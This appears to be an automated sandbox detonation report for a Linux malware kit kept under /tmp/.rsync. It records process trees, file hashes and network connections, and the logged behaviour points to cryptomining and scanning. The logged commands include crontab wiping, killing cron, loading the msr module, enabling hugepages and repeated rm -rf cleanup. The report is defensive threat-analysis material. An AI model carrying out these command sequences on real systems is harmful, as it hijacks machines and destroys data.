[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

Network

N/A

Files

N/A

Analysis: behavioral31

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

0s

Max time network

132s

Command Line

[/tmp/.rsync/c/lib/64/libc.so.6]

Signatures

N/A

Processes

/tmp/.rsync/c/lib/64/libc.so.6

[/tmp/.rsync/c/lib/64/libc.so.6]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

debian9-mipsel-20240611-en

Max time kernel

11s

Command Line

[/tmp/.rsync/a/run]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.rsync/a/dir.dir /tmp/.rsync/a/run N/A
File opened for modification /tmp/.rsync/a/bash.pid /tmp/.rsync/a/run N/A

Processes

/tmp/.rsync/a/run

[/tmp/.rsync/a/run]

/tmp/.rsync/a/stop

[./stop]

/bin/sleep

[sleep 10]

/bin/cat

[cat dir.dir]

/bin/uname

[uname -m]

Network

N/A

Files

/tmp/.rsync/a/dir.dir

MD5 b3d878adcf4672bbd1f31cffac10c769
SHA1 ce5798837933ece35a7e26a0a3dc06cab19c6275
SHA256 ea5fce19c5fbbbc6c3c36eb9e8e295dfb525e9669aafaf8abe9ddb4e00e345c7
SHA512 019d21a618b3ccc70c0c7ede225cbbb704e2b448048586c44c74c81a747129da9f3f9675f2a29363af320d2684974a1ff00ac608c53de4458aeacd3ed4f9da2c

/tmp/.rsync/a/bash.pid

MD5 68b329da9893e34099c7d8ad5cb9c940
SHA1 adc83b19e793491b1c6ea0fd8b46cd9f32e592fc
SHA256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
SHA512 be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

Analysis: behavioral20

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

debian9-armhf-20240418-en

Max time kernel

0s

Command Line

[/tmp/.rsync/c/golan]

Signatures

N/A

Processes

/tmp/.rsync/c/golan

[/tmp/.rsync/c/golan]

Network

N/A

Files

N/A

Analysis: behavioral24

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/.rsync/c/lib/32/libdl.so.2]

Signatures

N/A

Processes

/tmp/.rsync/c/lib/32/libdl.so.2

[/tmp/.rsync/c/lib/32/libdl.so.2]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

10s

Max time network

129s

Command Line

[/tmp/.rsync/a/a]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/.rsync/a/upd /tmp/.rsync/a/upd N/A

Loads a kernel module

rootkit
Description Indicator Process Target
N/A /lib/modules/4.15.0-213-generic/kernel/arch/x86/kernel/msr.ko /sbin/modprobe N/A

Enumerates running processes

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A

Reads CPU attributes

Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A

Enumerates kernel/hardware configuration

Description Indicator Process Target
File opened for reading /sys/devices/system/node /tmp/.rsync/a/a N/A
File opened for reading /sys/module/msr/initstate /sbin/modprobe N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/1504/stat /usr/bin/killall N/A
File opened for reading /proc/34/status /bin/ps N/A
File opened for reading /proc/581/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1169/cmdline /usr/bin/pkill N/A
File opened for reading /proc/460/status /bin/ps N/A
File opened for reading /proc/547/cmdline /bin/ps N/A
File opened for reading /proc/581/status /usr/bin/pkill N/A
File opened for reading /proc/84/stat /usr/bin/killall N/A
File opened for reading /proc/972/stat /usr/bin/killall N/A
File opened for reading /proc/581/cmdline /bin/ps N/A
File opened for reading /proc/962/status /bin/ps N/A
File opened for reading /proc/962/cmdline /bin/ps N/A
File opened for reading /proc/15/cmdline /usr/bin/pkill N/A
File opened for reading /proc/972/cmdline /usr/bin/pkill N/A
File opened for reading /proc/177/cmdline /bin/ps N/A
File opened for reading /proc/517/stat /bin/ps N/A
File opened for reading /proc/1142/stat /bin/ps N/A
File opened for reading /proc/1502/stat /bin/ps N/A
File opened for reading /proc/1073/status /usr/bin/pkill N/A
File opened for reading /proc/16/status /bin/ps N/A
File opened for reading /proc/1301/cmdline /usr/bin/killall N/A
File opened for reading /proc/170/cmdline /bin/ps N/A
File opened for reading /proc/1084/stat /bin/ps N/A
File opened for reading /proc/250/cmdline /usr/bin/killall N/A
File opened for reading /proc/280/stat /usr/bin/killall N/A
File opened for reading /proc/1291/status /usr/bin/pkill N/A
File opened for reading /proc/28/stat /bin/ps N/A
File opened for reading /proc/1318/stat /bin/ps N/A
File opened for reading /proc/446/status /usr/bin/pkill N/A
File opened for reading /proc/1197/cmdline /usr/bin/pkill N/A
File opened for reading /proc/172/stat /bin/ps N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/475/stat /usr/bin/killall N/A
File opened for reading /proc/15/status /bin/ps N/A
File opened for reading /proc/1197/cmdline /bin/ps N/A
File opened for reading /proc/26/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1060/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1343/stat /bin/ps N/A
File opened for reading /proc/1379/status /bin/ps N/A
File opened for reading /proc/323/stat /usr/bin/killall N/A
File opened for reading /proc/1192/status /bin/ps N/A
File opened for reading /proc/215/cmdline /usr/bin/killall N/A
File opened for reading /proc/1/cmdline /bin/ps N/A
File opened for reading /proc/26/cmdline /bin/ps N/A
File opened for reading /proc/1169/status /bin/ps N/A
File opened for reading /proc/11/status /usr/bin/pkill N/A
File opened for reading /proc/185/status /usr/bin/pkill N/A
File opened for reading /proc/85/stat /usr/bin/killall N/A
File opened for reading /proc/21/cmdline /bin/ps N/A
File opened for reading /proc/1146/stat /bin/ps N/A
File opened for reading /proc/1188/cmdline /bin/ps N/A
File opened for reading /proc/1197/stat /bin/ps N/A
File opened for reading /proc/1189/cmdline /usr/bin/pkill N/A
File opened for reading /proc/25/stat /usr/bin/killall N/A
File opened for reading /proc/683/stat /bin/ps N/A
File opened for reading /proc/2/stat /bin/ps N/A
File opened for reading /proc/15/stat /bin/ps N/A
File opened for reading /proc/82/stat /usr/bin/killall N/A
File opened for reading /proc/467/stat /usr/bin/killall N/A
File opened for reading /proc/1273/stat /usr/bin/killall N/A
File opened for reading /proc/184/cmdline /bin/ps N/A
File opened for reading /proc/1531/stat /bin/ps N/A
File opened for reading /proc/1288/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1503/status /usr/bin/pkill N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.rsync/a/upd /tmp/.rsync/a/a N/A
File opened for modification /tmp/.rsync/a/.proc /tmp/.rsync/a/stop N/A
File opened for modification /tmp/.rsync/a/dir.dir /tmp/.rsync/a/run N/A
File opened for modification /tmp/.rsync/a/bash.pid /tmp/.rsync/a/run N/A
File opened for modification /tmp/.rsync/a/dir.dir /tmp/.rsync/a/a N/A

Processes

/tmp/.rsync/a/a

[/tmp/.rsync/a/a]

/usr/bin/crontab

[crontab -r]

/bin/cat

[cat dir.dir]

/usr/bin/nproc

[nproc]

/sbin/sysctl

[sysctl -w vm.nr_hugepages=1]

/usr/bin/find

[find /sys/devices/system/node/node0 -maxdepth 0 -type d]

/sbin/modprobe

[modprobe msr]

/bin/grep

[grep AMD Ryzen]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep Intel]

/bin/cat

[cat /proc/cpuinfo]

/bin/chmod

[chmod u+x upd]

/bin/chmod

[chmod 777 a anacron cron dir.dir run stop upd]

/tmp/.rsync/a/upd

[./upd]

/tmp/.rsync/a/run

[./run]

/tmp/.rsync/a/stop

[./stop]

/usr/bin/pkill

[pkill -9 cron]

/usr/bin/killall

[killall -9 cron]

/usr/bin/awk

[awk {print $1}]

/bin/grep

[grep -v grep]

/bin/grep

[grep cron]

/bin/ps

[ps x]

/bin/rm

[rm -rf .proc]

/bin/sleep

[sleep 10]

/bin/cat

[cat dir.dir]

/bin/uname

[uname -m]

/tmp/.rsync/a/cron

[./cron]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.1.91:443 tcp
US 151.101.1.91:443 tcp
GB 89.187.167.5:443 tcp

Files

/tmp/.rsync/a/dir.dir

MD5 b3d878adcf4672bbd1f31cffac10c769
SHA1 ce5798837933ece35a7e26a0a3dc06cab19c6275
SHA256 ea5fce19c5fbbbc6c3c36eb9e8e295dfb525e9669aafaf8abe9ddb4e00e345c7
SHA512 019d21a618b3ccc70c0c7ede225cbbb704e2b448048586c44c74c81a747129da9f3f9675f2a29363af320d2684974a1ff00ac608c53de4458aeacd3ed4f9da2c

/tmp/.rsync/a/upd

MD5 a136fbe534c2487d3c89bd6a26847bd0
SHA1 11b9362ba79b67dd5d5baf7cf11e0003f049d6e0
SHA256 419a443ff93475ef3abb6e71e5a94e56aea8b7c1f1c4402b3662425815432d46
SHA512 85047cf9d22037d2581ae41275107b243c0bb3259b57fe46bd3fd04a1abe75a7fdeace8a9eae1fae31349a00183206b40259ab3957db8f4f16a79e67133485e9

/tmp/.rsync/a/bash.pid

MD5 68b329da9893e34099c7d8ad5cb9c940
SHA1 adc83b19e793491b1c6ea0fd8b46cd9f32e592fc
SHA256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
SHA512 be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

Analysis: behavioral6

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

0s

Max time network

132s

Command Line

[/tmp/.rsync/a/cron]

Signatures

N/A

Processes

/tmp/.rsync/a/cron

[/tmp/.rsync/a/cron]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

debian9-mipsbe-20240418-en

Max time kernel

11s

Command Line

[/tmp/.rsync/a/run]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.rsync/a/dir.dir /tmp/.rsync/a/run N/A
File opened for modification /tmp/.rsync/a/bash.pid /tmp/.rsync/a/run N/A

Processes

/tmp/.rsync/a/run

[/tmp/.rsync/a/run]

/tmp/.rsync/a/stop

[./stop]

/bin/sleep

[sleep 10]

/bin/cat

[cat dir.dir]

/bin/uname

[uname -m]

Network

N/A

Files

/tmp/.rsync/a/dir.dir

MD5 b3d878adcf4672bbd1f31cffac10c769
SHA1 ce5798837933ece35a7e26a0a3dc06cab19c6275
SHA256 ea5fce19c5fbbbc6c3c36eb9e8e295dfb525e9669aafaf8abe9ddb4e00e345c7
SHA512 019d21a618b3ccc70c0c7ede225cbbb704e2b448048586c44c74c81a747129da9f3f9675f2a29363af320d2684974a1ff00ac608c53de4458aeacd3ed4f9da2c

/tmp/.rsync/a/bash.pid

MD5 68b329da9893e34099c7d8ad5cb9c940
SHA1 adc83b19e793491b1c6ea0fd8b46cd9f32e592fc
SHA256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
SHA512 be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

Analysis: behavioral12

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

debian9-armhf-20240611-en

Max time kernel

1s

Command Line

[/tmp/.rsync/a/stop]

Signatures

Enumerates running processes

Reads CPU attributes

Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/310/status /usr/bin/pkill N/A
File opened for reading /proc/601/cmdline /usr/bin/pkill N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/ps N/A
File opened for reading /proc/279/stat /bin/ps N/A
File opened for reading /proc/596/status /bin/ps N/A
File opened for reading /proc/21/status /bin/ps N/A
File opened for reading /proc/310/stat /bin/ps N/A
File opened for reading /proc/22/status /usr/bin/pkill N/A
File opened for reading /proc/599/cmdline /usr/bin/pkill N/A
File opened for reading /proc/19/stat /usr/bin/killall N/A
File opened for reading /proc/674/stat /usr/bin/killall N/A
File opened for reading /proc/10/stat /bin/ps N/A
File opened for reading /proc/20/status /bin/ps N/A
File opened for reading /proc/18/status /bin/ps N/A
File opened for reading /proc/74/status /bin/ps N/A
File opened for reading /proc/145/status /bin/ps N/A
File opened for reading /proc/147/stat /bin/ps N/A
File opened for reading /proc/668/status /bin/ps N/A
File opened for reading /proc/147/stat /usr/bin/killall N/A
File opened for reading /proc/27/cmdline /bin/ps N/A
File opened for reading /proc/12/status /usr/bin/pkill N/A
File opened for reading /proc/137/status /usr/bin/pkill N/A
File opened for reading /proc/10/status /bin/ps N/A
File opened for reading /proc/sys/kernel/osrelease /usr/bin/pkill N/A
File opened for reading /proc/602/cmdline /usr/bin/pkill N/A
File opened for reading /proc/664/cmdline /bin/ps N/A
File opened for reading /proc/5/status /usr/bin/pkill N/A
File opened for reading /proc/107/stat /bin/ps N/A
File opened for reading /proc/140/cmdline /usr/bin/pkill N/A
File opened for reading /proc/13/cmdline /bin/ps N/A
File opened for reading /proc/596/stat /bin/ps N/A
File opened for reading /proc/674/stat /bin/ps N/A
File opened for reading /proc/19/status /usr/bin/pkill N/A
File opened for reading /proc/281/cmdline /usr/bin/pkill N/A
File opened for reading /proc/599/status /usr/bin/pkill N/A
File opened for reading /proc/14/stat /bin/ps N/A
File opened for reading /proc/29/cmdline /bin/ps N/A
File opened for reading /proc/644/cmdline /bin/ps N/A
File opened for reading /proc/279/cmdline /usr/bin/pkill N/A
File opened for reading /proc/25/stat /usr/bin/killall N/A
File opened for reading /proc/74/stat /usr/bin/killall N/A
File opened for reading /proc/602/cmdline /bin/ps N/A
File opened for reading /proc/9/cmdline /usr/bin/pkill N/A
File opened for reading /proc/277/stat /usr/bin/killall N/A
File opened for reading /proc/596/stat /usr/bin/killall N/A
File opened for reading /proc/17/status /bin/ps N/A
File opened for reading /proc/324/status /bin/ps N/A
File opened for reading /proc/640/cmdline /bin/ps N/A
File opened for reading /proc/15/cmdline /usr/bin/pkill N/A
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/281/stat /usr/bin/killall N/A
File opened for reading /proc/104/cmdline /bin/ps N/A
File opened for reading /proc/320/status /bin/ps N/A
File opened for reading /proc/147/cmdline /bin/ps N/A
File opened for reading /proc/15/status /usr/bin/pkill N/A
File opened for reading /proc/4/stat /bin/ps N/A
File opened for reading /proc/22/status /bin/ps N/A
File opened for reading /proc/140/status /bin/ps N/A
File opened for reading /proc/29/cmdline /usr/bin/pkill N/A
File opened for reading /proc/279/stat /usr/bin/killall N/A
File opened for reading /proc/9/stat /bin/ps N/A
File opened for reading /proc/29/stat /bin/ps N/A
File opened for reading /proc/21/cmdline /bin/ps N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.rsync/a/.proc /tmp/.rsync/a/stop N/A

Processes

/tmp/.rsync/a/stop

[/tmp/.rsync/a/stop]

/usr/bin/pkill

[pkill -9 cron]

/usr/bin/killall

[killall -9 cron]

/bin/ps

[ps x]

/bin/grep

[grep cron]

/bin/grep

[grep -v grep]

/usr/bin/awk

[awk {print $1}]

/bin/rm

[rm -rf .proc]

Network

N/A

Files

N/A

Analysis: behavioral22

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

debian9-mipsel-20240418-en

Max time kernel

0s

Command Line

[/tmp/.rsync/c/golan]

Signatures

N/A

Processes

/tmp/.rsync/c/golan

[/tmp/.rsync/c/golan]

Network

N/A

Files

N/A

Analysis: behavioral26

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

0s

Max time network

132s

Command Line

[/tmp/.rsync/c/lib/32/libnss_files.so.2]

Signatures

N/A

Processes

/tmp/.rsync/c/lib/32/libnss_files.so.2

[/tmp/.rsync/c/lib/32/libnss_files.so.2]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral28

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/.rsync/c/lib/32/libresolv-2.23.so]

Signatures

N/A

Processes

/tmp/.rsync/c/lib/32/libresolv-2.23.so

[/tmp/.rsync/c/lib/32/libresolv-2.23.so]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

10s

Max time network

132s

Command Line

[/tmp/.rsync/a/run]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.rsync/a/dir.dir /tmp/.rsync/a/run N/A
File opened for modification /tmp/.rsync/a/bash.pid /tmp/.rsync/a/run N/A

Processes

/tmp/.rsync/a/run

[/tmp/.rsync/a/run]

/tmp/.rsync/a/stop

[./stop]

/bin/sleep

[sleep 10]

/bin/cat

[cat dir.dir]

/bin/uname

[uname -m]

/tmp/.rsync/a/cron

[./cron]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.1.91:443 tcp
US 151.101.1.91:443 tcp
GB 195.181.164.15:443 tcp

Files

/tmp/.rsync/a/dir.dir

MD5 b3d878adcf4672bbd1f31cffac10c769
SHA1 ce5798837933ece35a7e26a0a3dc06cab19c6275
SHA256 ea5fce19c5fbbbc6c3c36eb9e8e295dfb525e9669aafaf8abe9ddb4e00e345c7
SHA512 019d21a618b3ccc70c0c7ede225cbbb704e2b448048586c44c74c81a747129da9f3f9675f2a29363af320d2684974a1ff00ac608c53de4458aeacd3ed4f9da2c

/tmp/.rsync/a/bash.pid

MD5 68b329da9893e34099c7d8ad5cb9c940
SHA1 adc83b19e793491b1c6ea0fd8b46cd9f32e592fc
SHA256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
SHA512 be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

Analysis: behavioral29

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:58

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/.rsync/c/lib/32/libresolv.so.2]

Signatures

N/A

Processes

/tmp/.rsync/c/lib/32/libresolv.so.2

[/tmp/.rsync/c/lib/32/libresolv.so.2]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral30

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/.rsync/c/lib/32/tsm]

Signatures

N/A

Processes

/tmp/.rsync/c/lib/32/tsm

[/tmp/.rsync/c/lib/32/tsm]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

debian9-mipsbe-20240611-en

Max time kernel

14s

Command Line

[/tmp/.rsync/a/a]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/.rsync/a/upd /tmp/.rsync/a/upd N/A

Enumerates running processes

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A

Reads CPU attributes

Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /sbin/sysctl N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A

Enumerates kernel/hardware configuration

Description Indicator Process Target
File opened for reading /sys/devices/system/node /tmp/.rsync/a/a N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/76/cmdline /bin/ps N/A
File opened for reading /proc/120/cmdline /bin/ps N/A
File opened for reading /proc/384/stat /bin/ps N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/76/stat /usr/bin/killall N/A
File opened for reading /proc/2/status /bin/ps N/A
File opened for reading /proc/3/status /bin/ps N/A
File opened for reading /proc/23/status /bin/ps N/A
File opened for reading /proc/10/cmdline /usr/bin/pkill N/A
File opened for reading /proc/725/cmdline /usr/bin/pkill N/A
File opened for reading /proc/71/stat /usr/bin/killall N/A
File opened for reading /proc/74/status /bin/ps N/A
File opened for reading /proc/748/cmdline /bin/ps N/A
File opened for reading /proc/755/cmdline /bin/ps N/A
File opened for reading /proc/37/cmdline /usr/bin/pkill N/A
File opened for reading /proc/677/status /bin/ps N/A
File opened for reading /proc/728/stat /bin/ps N/A
File opened for reading /proc/387/cmdline /bin/ps N/A
File opened for reading /proc/748/cmdline /usr/bin/pkill N/A
File opened for reading /proc/7/stat /usr/bin/killall N/A
File opened for reading /proc/687/stat /usr/bin/killall N/A
File opened for reading /proc/1/stat /bin/ps N/A
File opened for reading /proc/700/stat /bin/ps N/A
File opened for reading /proc/78/status /usr/bin/pkill N/A
